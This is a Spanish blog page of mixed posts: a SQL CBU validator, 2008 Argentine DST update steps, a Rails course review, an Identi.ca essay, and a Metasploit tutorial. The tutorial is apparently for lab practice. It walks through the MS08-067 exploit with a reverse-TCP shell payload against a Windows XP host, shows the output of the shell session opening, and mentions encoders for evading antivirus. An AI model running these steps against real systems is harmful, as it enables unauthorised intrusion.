aleperretta
Usuario (Argentina)
Le paso el codigo sql para validar un cbu en sql hecho por Diego Mancini create FUNCTION . ( -- Add the parameters for the function here @block VARCHAR(100) ) RETURNS TINYINT AS BEGIN DECLARE @subblock VARCHAR(100) DECLARE @posicion INTEGER DECLARE @digito CHAR(1) DECLARE @Pond CHAR(4) DECLARE @largo INTEGER DECLARE @suma INTEGER SELECT @suma = 0 SELECT @largo = LEN ( @block ) SELECT @digito = SUBSTRING ( @block , @largo , 1 ) SELECT @subblock = SUBSTRING ( @block , 1 , @largo - 1 ) SELECT @Pond = '9713' SELECT @posicion = 1 WHILE @posicion <= @largo - 1 BEGIN SELECT @suma = @suma + CONVERT( INTEGER , SUBSTRING ( @subblock , @largo - @posicion , 1 )) * CONVERT( INTEGER , SUBSTRING ( @pond ,CASE (@posicion % 4) WHEN 1 THEN 4 WHEN 2 THEN 3 WHEN 3 THEN 2 WHEN 0 THEN 1 END , 1 ) ) SELECT @posicion = @posicion + 1 END if @digito = RIGHT ( convert( varchar, 10 - ( @suma % 10 )) , 1 ) RETURN 1 RETURN 0 END create FUNCTION . ( -- Add the parameters for the function here @block VARCHAR(100) ) RETURNS TINYINT AS BEGIN DECLARE @subblock VARCHAR(100) DECLARE @posicion INTEGER DECLARE @digito CHAR(1) DECLARE @Pond CHAR(4) DECLARE @largo INTEGER DECLARE @suma INTEGER SELECT @suma = 0 SELECT @largo = LEN ( @block ) SELECT @digito = SUBSTRING ( @block , @largo , 1 ) SELECT @subblock = SUBSTRING ( @block , 1 , @largo - 1 ) SELECT @Pond = '9713' SELECT @posicion = 1 WHILE @posicion <= @largo - 1 BEGIN SELECT @suma = @suma + CONVERT( INTEGER , SUBSTRING ( @subblock , @largo - @posicion , 1 )) * CONVERT( INTEGER , SUBSTRING ( @pond ,CASE (@posicion % 4) WHEN 1 THEN 4 WHEN 2 THEN 3 WHEN 3 THEN 2 WHEN 0 THEN 1 END , 1 ) ) SELECT @posicion = @posicion + 1 END if @digito = RIGHT ( convert( varchar, 10 - ( @suma % 10 )) , 1 ) RETURN 1 RETURN 0 END
Registrate y eliminá la publicidad! Les paso como actualizar linux y windows para el cambio de horario el proximo 19 de octubre del 2008. cd /tmp wget http://devel.perretta.com.ar/southamerica zic -l America/Argentina/Buenos_Aires southamerica rm -f /tmp/southamerica para verificar que funcione pueden hacer lo siguiente zdump -v /etc/localtime y veran que el 19 de octubre del 2008 cambiara la hora. Para windows de forma manual pero recomendada por Microsoft http://www.microsoft.com/argentina/dst/recomendaciones.aspx La version no oficial sacada de la pagina de ponicke, con su correspondiente advertencia (http://blogs.technet.com/ponicke/), Adventencia: No usar estas instrucciones en produccion, el post es beta. crear un archivo con el siguiente contenido Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Argentina Standard Time] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Argentina Standard Time] "Display"="(GMT-03:00) Buenos Aires" "Dlt"="Argentina Daylight Time" "Std"="Argentina Standard Time" "TZI"=hex:b4,00,00,00,00,00,00,00,c4,ff,ff,ff,00,00,03,00,00,00,03,00,00,00,00,\ 00,00,00,00,00,00,00,0a,00,00,00,03,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Argentina Standard Time\Dynamic DST] "FirstEntry"=dword:000007d7 "LastEntry"=dword:000007d9 "2009"=hex:b4,00,00,00,00,00,00,00,c4,ff,ff,ff,00,00,03,00,00,00,03,00,00,00,\ 00,00,00,00,00,00,00,00,0a,00,00,00,03,00,00,00,00,00,00,00,00,00 "2008"=hex:b4,00,00,00,00,00,00,00,c4,ff,ff,ff,00,00,03,00,00,00,03,00,00,00,\ 00,00,00,00,00,00,00,00,0a,00,00,00,03,00,00,00,00,00,00,00,00,00 "2007"=hex:b4,00,00,00,00,00,00,00,c4,ff,ff,ff,00,00,01,00,01,00,01,00,00,00,\ 00,00,00,00,00,00,00,00,0c,00,00,00,05,00,00,00,00,00,00,00,00,00 Luego grabarlo como tzupdate.reg y correrlo. El cambio es decreto y se exceptuan ciertas provincias El Gobierno confirmó en el Boletín Oficial que el cambio de hora es un absurdo El Gobierno de Cristina de Kirchner formalizó ayer (16/10) el cambio del huso horario, desde la cero hora del domingo 19 de octubre hasta el tercer domingo de marzo próximo para el período estival 2008/2009, a través del decreto 1693 publicado en el Boletín Oficial, que lleva la firma de la presidente, del jefe de Gabinete, Sergio Massa, y del ministro de Planificación, Julio De Vido. Como informamos ayer, el decreto señala: "Fíjase el período estival correspondiente al año 2008/2009 desde la cero hora del tercer domingo del mes de octubre de 2008, y hasta la cero hora del tercer domingo del mes de marzo de 2009, en todo el territorio de la República Argentina". Pero ante la negativa de la mayoría de los gobernadores a sumarse a esta polémica y poco eficaz medida, el gobierno debió aclarar hoy en el mismo boletín a través del decreto 1705 lo siguiente: N° 1705 - Quedan exceptuadas diversas provincias de la modificación del uso horario. Provincias exceptuadas: CATAMARCA LA RIOJA MENDOZA SALTA SAN JUAN SAN LUIS LA PAMPA NEUQUEN RIO NEGRO CHUBUT SANTA CRUZ TIERRA DEL FUEGO, ANTARTIDA E ISLAS DEL ATLANTICO SUR <a href='http://b.t.net.ar/www/delivery/ck.php?n=a2afc290&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://b.t.net.ar/www/delivery/avw.php?zoneid=58&cb=INSERT_RANDOM_NUMBER_HERE&n=a2afc290' border='0' alt='' /></a>
Se trata de una aplicación web para aprender a programar en Rails. Es un tutorial bastante interactivo, nos muestran videos por Gregg Pollack junto a presentaciones donde se explican algunos conceptos básicos de Rails. Luego hay que completar los Labs en la aplicación mismo, aplicando los conocimientos que fuimos adquiriendo en las presentaciones. Los ejercicios son bastante rápidos, y la aplicación funciona muy bien. Por ahora hay 5 laboratorios, y son básicos como para gente que está empezando en el tema. De todas formas es muy recomendable. A aprender!!! http://railsforzombies.org
De acuerdo con el sitio web del proyecto, Metasploit es “…tanto un sistema de pruebas de intrusión como una plataforma de desarrollo para la creación de herramientas de seguridad y exploits.” El framework incluye una serie de módulos. Cada módulo implementa un ataque específico. A medida que van apareciendo nuevos ataques, se van añadiendo los correspondientes módullos al framework, manteniéndose de este modo el sistema actualizado con los últimos exploits y técnicas de ataque El proyecto Metasploit mantiene una imagen de servidor virtual VMware conocida como Metasploitable. La imagen Metasploitable, basada en Ubuntu, contiene más agujeros de seguridad que un queso suizo y supone el candidato perfecto para aquellos administradores que quieran practicar un poco con Metasploit como herramienta de pruebas de intrusión. El servidor Metasploitable imple menta deliberadamente servicios con configuraciones inseguras y vulnerabilidades que lo convierten en el candidato ideal para las pruebass. Bajamos el framework desde http://www.metasploit.com/framework/download/ segun la plataforma que corresponda Primero que nada conozcamos como esta dividido MSF (Metasploit Framework): * Exploits: aquí encontramos todos los exploits disponibles en MSF y que podemos utilizar. Estan dividos por SO's y categoriras. Ejemplo: exploits/windows/browser/ y aquí econtrariamos los exploits disponibles para los navegadores que corren en el SO windows. Payloads: esta es una de las cosas mas importantes, es la accion que se va a realizar si se logra explotar la vulnerabilidad que selecccionamos . Ejemplo: windows/shell/reverse_tcp y con esto obtendriamos una shell inversa. Auxiliary: son scripts con diferentes funciones. Ejemplo: auxiliary/scanner/portscan/tcp y utilizando este scanner de puertos tcp, obtendriamos el estado de puertos y el servicio que esta corriendo bajo estos mismo. Muy util si no te gusta Nmap xD Enconders: son algoritmos de codificación para cuando hagamos ingeniería social y tengamos que evadir algunos antivirus. Muy importante conocerlo. Con eso bastaria conocer por el momento/ Ahora veamos los comandos que necesitaremos utilizar para poder desplazarnos por MSF: help: Nos muestra los comandos disponibles actualmente. show: Nos muestra todo el contenido de cada categoria: exploits, payloads, auxiliary encoders, NOP Generators. Aunque tambien podemos especificar una categoria. Ejemplo: show exploits. search: Busca cualquier objeto mediante una palabra clave. Ejemplo: search ftp info: Proporciona información sobre un exploit,payload, auxiliary, etc. Es muy importante ya que con este comando tambien podemos conocer la descripcion, referencias y equipos en los que se puede utilizar el objeto al que estamos invocando Ejemplo: info windows/ftp/proftp_banner use: Con este comando, establemos el objeto con el que vamos a trabajar; sea exploit o auxiliary que son con los que vamos a trabajar nosotros. Ejemplo: use exploits/windows/ show options: Importantisimo . Si no conocemos como funciona algun exploit o auxiliary este comando nos ayudara muchisimo, aunque por lo general no requieren de muchos parametros. Se ejecuta despues que hayamos seleccionado el objeto: exploit, auxiliary o payload(unicamente si ya se ha seleccionado un exploit) set: Con este comando, establecemos los parametros necesarios de algun exploit o auxiliary. Los parametros dependen del objeto que hayamos seleccionado anteriormente. Por mecionar algun ejemplo: set RHOST xxx.xxx.xxx.xx x, set RPORT 445, set LHOST xxx.xxx.xxx.xx x, set LPORT 2525. Son solo ejemplos. set PAYLOAD: Este comando lo pongo aparte porque es importante conocerlo bien. Como mencione anteriormente los payloads es la accion que se realiza cuando un exploit ha explotado una vulnerabilidad correctamente. Lo utilizamos despues de haber seleccionado un exploit únicamente. Comunmente necesitamos establecer los parametros LHOST y LPORT. back: Con esto volveriamos a comenzar desde 0. Ademas de esos comandos hay muchos otros que poco a poco los iremos viendo cada vez que sea necesario. Tambien debo aclarar que cuando entramos a la interfaz de consola (msfconsole) de MSF tambien podemos hacer uso de los comandos de nuestro SO Gnu/Linux como si estuviéramos en una consola normal. Les recomiendo que antes de comenzar con la explotación naveguen un poco en MSF utilizando los comandos basicos que mencione anteriormente y cualquier cosa que vean interesante, para que se vallan familiarizando y asi se haga mas facil la practica. Una vez configurado y ejecutándose el servidor Metasploitable, se puede usar Nmap para identificar los puertos abiertos ejemplo # nmap 192.168.0.1 Interesting ports on 192.168.0.1: Not shown: 988 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3306/tcp open mysql 5432/tcp open postgresql 8009/tcp open ajp13 msfconsole deberia aparecer una img similar a esta Bueno vamos a probar el rpc a esta maquina windows msf > use exploit/windows/smb/ms08_067_netapi Verificamos las opciones del exploit para ver cuales estan disponibles y cuales son necesarias para luego ingresarlas: Código: msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set RHOST 10.21.37.179 RHOST => 10.21.37.179 msf exploit(ms08_067_netapi) > Nota: las opciones que tienen “yes” en la columna “Required” significa que son obligatorias. Algunas se llenan automáticamente, otras hay que ingresarlas manualmente. Luego de ingresar el parametro set RHOST deberían de ver de nuevo las opciones para que vean como se llenan las opciones requeridas. Ahora seleccionamos el PAYLOAD que vemos a utilizar. En esta ocacion comenzaremos con una simple shell, mas adelante utilizaremos otros. Código: msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.21.37.179 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set LHOST 10.21.17.215 LHOST => 10.21.17.215 Como veran hemos ingresado los parametros requeridos tanto del exploit como del payload. Ahora solo nos falta verificar (show options) que todo este como queremos para luego ejecutar un comando que no he mencionado, pero es el mas esperado. Código: msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (240 bytes)[*] Command shell session 1 opened (10.21.17.215:4444 -> 10.21.37.179:1035) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32> Y eso es todo samigosssssssss Fuentes> http://comunidad.dragonjar.org/f184/tutorial-conociendo-metasploit-framework-en-construccion-rcart-8627/ y revista 69 de linux magazine.
Al igual que Gimp no es el Photoshop libre, Identi.ca no es el Twitter libre; afirmarlo es simplificar demasiado las cosas. Tanto Gimp como Identi.ca son dos proyectos libres que no imitan a sus contrapartidas privativas, sino que simplemente son mejores. Por eso he decidido dejar de utilizar Twitter completamente para pasarme a Identi.ca. En este artículo explico por qué he tomado esta decisión. Identi.ca es un servicio de MicroBlogging basado en StatusNet. A su vez, StatusNet es un conjunto de herramientas libres que permiten crear un servicio de MicroBlogging libre. La idea detrás de StatusNet es crear una plataforma libre sobre la que cualquier persona pueda montar su propio servicio de MicroBlogging; el ejemplo más evidente es Identi.ca. Para conseguir ése objetivo StatusNet se basa en protocolos como OAuth, OpenID, Yadis, XMPP, OpenMicroBlogging o FOAF. Antes de que empecemos a hablar de Identi.ca me gustaría empezar a hablar de OpenMicroBlogging, ya que es uno de los pilares maestros de StatusNet e Identi.ca. OpenMicroBlogging es un protocolo abierto que permite a distintos servicios de MicroBlogging interactuar entre si. Es decir, supongamos que mi empresa ha diseñado un servicio de MicroBlogging basado en StatusNet para todos sus empleados, y supongamos también que tengo una cuenta en Identi.ca; como los dos servicios están basados en OpenMicroBlogging podré acceder a mi cuenta de identi.ca a través de mi perfil en el servicio de MicroBlogging de la empresa y a la inversa. La interconexión entre los diferentes proyectos basados en StatusNet es brutal. Todo está conectado con todo; las posibilidades se multiplican. Sin embargo, ¿es ésto seguro? Para responder esta interrogante OAuth, OpenID y Yadis han nacido. Normalmente cuando hacemos login en cualquier página web damos un nombre de usuario y una contraseña. Con estos dos datos la página web autentica al usuario. Para acceder a Identi.ca (por ejemplo) tenemos que hacer lo propio, sin embargo, si ya estoy autenticado en identi.ca y quiero acceder a mi cuenta en la red social de la empresa (por ejemplo), ¿hay alguna forma para que no me tenga que autenticar de nuevo? Sí: OpenID. Este protocolo utiliza una URL proporcionada por un “servidor de confianza” para autenticar a un usuario. Si configuro mi cuenta de la red social de la empresa para que acepte una URL determinada, me podré autenticar desde Identi.ca siempre que la configure para que utilice la misma URL (obviamente). Es decir, que a través de una URL ofrecida por un servidor que soporte OpenID me podré autenticar en un perfil diferente sin tener que loguearme. Sin embargo, es probable que no quiera dotar de todos los permisos a una cuenta “invitada”. Probablemente me interese restringirla para que solo utilice unos determinados recursos. Por ejemplo la puedo permitir que escriba mensajes pero que no modifique la información personal. Para conseguir ésto OAuth se pone en marcha. En vez de utilizar una URL o un par usuario-contraseña, OAuth se basa en unos paquetes denominados tokens para autenticar al usuario. Estos paquetes se pueden crear a medida con cada conexión, de tal forma que puedo configurar muchos más parámetros, como por ejemplo el tiempo de conexión o los recursos a los que tenga acceso. Es decir, que mediante OAuth consigo restringir el acceso de las cuentas invitadas generando unos paquetes especiales denominados tokens. Para acabar con esta explicación, tengo que deciros qué hace Yadis. Supongamos que estoy en el mismo caso que llevo utilizando todo el artículo, el de la cuenta en identi.ca y en la red social de la empresa. Supongamos que identi.ca soporta OAuth y OpenID, pero que la red social de la empresa solo soporta OpenID. Inicialmente identi.ca no sabe que mi perfil en la red social de la empresa no implementa OAuth, por lo que casi seguro que tendré problemas si trato de interconectar los dos perfiles. ¿Cómo se soluciona? Hablando. Antes de realizar la autenticación los dos servicios de MicroBlogging se saludan y le dicen al otro los protocolos de autenticación que soportan. El lenguaje que utilizan es el ofrecido por el protocolo Yadis. Casi todo el texto y archivos que los usuarios suben a este servicio están disponibles bajo la licencia de Identi.ca. Los usuarios aceptan la licencia en el momento en el que se registran. Normalmente los datos pueden ser copiados para uso comercial o no comercial, con algunas modificaciones o careciendo de ellas. Los datos que Identi.ca nunca va a compartir con otras personas son: Contraseña Correo-electrónico Cuentas de mensajería instantánea Números de teléfono Mensajes privados Es decir, que Identi.ca puede compartir con terceras personas los mensajes que escribas, pero nunca va a comercializar información personal. Además, si no estás muy de acuerdo con éste contrato, siempre puedes desarrollar tu propio servidor para identi.ca y guardar tú mismo toda la información que generes. Siempre va a ser tu decisión. El segundo as que me queda bajo la manga está compuesto por los grupos y el contexto de identi.ca. Los grupos son una agrupación de gente que habla sobre un tema determinado por el nombre del grupo. Es decir, si encuentras un grupo que se llama gimp, los mensajes que escribas y en los que incluyas la palabra !gimp se incluirán en los mensajes del grupo, para que cualquier persona ajena o perteneciente al grupo pueda verlos. Son muy interesantes si estás buscando información característica de un tema. Si leéis la tercera línea de éste párrafo de nuevo, leeréis que he escrito “si encuentras”; al contrario que las listas de twitter, eres tú el que decide si quiere o no entrar en un grupo, no una tercera persona, por lo que eres tú el primer beneficiado. Por último: el contexto, una de las mejores funcionalidades que presenta identi.ca. Cuando estás hablando con una persona, normalmente, entre las oleadas de tweets te suele costar encontrar los tweets pertenecientes a ésa conversación en concreto. Para arreglarlo, identi.ca cuenta con con el contexto, que agrupa los tweets de una conversación de forma que puedas localizarlos inmediatamente. Es una característicaexcelente que todavía no ha implementado twitter, pero por desgracia está un poco capada, afirmación que entenderás si lees el siguiente párrafo. Normalmente no me gusta utilizar identi.ca con la página web, ya que no me entero si alguien ha escrito un tweet, para solucionarlo lo más cómodo es instalar un cliente dedicado como pidgin (con una extensión para soportar status.net), pino, gwibber, choqok, turpial, hotot, el oficial de Status.net o mustard para celulares. Sin embargo, pierdes muchas funcionalidades (entre las que se incluye el contexto) y no sustituyen sino que complementan a la web. Para solucionarlo hace dos días encontré a HeyBuddy, un cliente que puede llegar a sustituir completamente la web. De entrada es el único cliente que haya visto que soporta el contexto, lo que le convierte automáticamente en el ganador. Además, también puedes suscribirte al canal de una persona y es sorprendentemente sencillo de usar. Sin embargo, también tiene algunas carencias. Las notificaciones deberían mejorar, no tiene soporte para definir acortadores y es un poco feo estéticamente. A pesar de todo, personalmente creo que es el mejor cliente para identi.ca. Conclusión: Se me quedan demasiadas cosas en el tintero, pero es que me podría pasar varios artículos hablando sobre identi.ca y no acabaría. Os recomiendo que os hagáis una cuenta, que os descargéis un cliente y que empecéis a descubrir identi.ca por vosotros mismos. Es el mejor servicio de MicroBlogging, ya que aparte de que es técnicamente muy superior no juega con tu información personal. Pásate a Identi.ca. Fuente > http://www.pillateunlinux.com/identi-ca/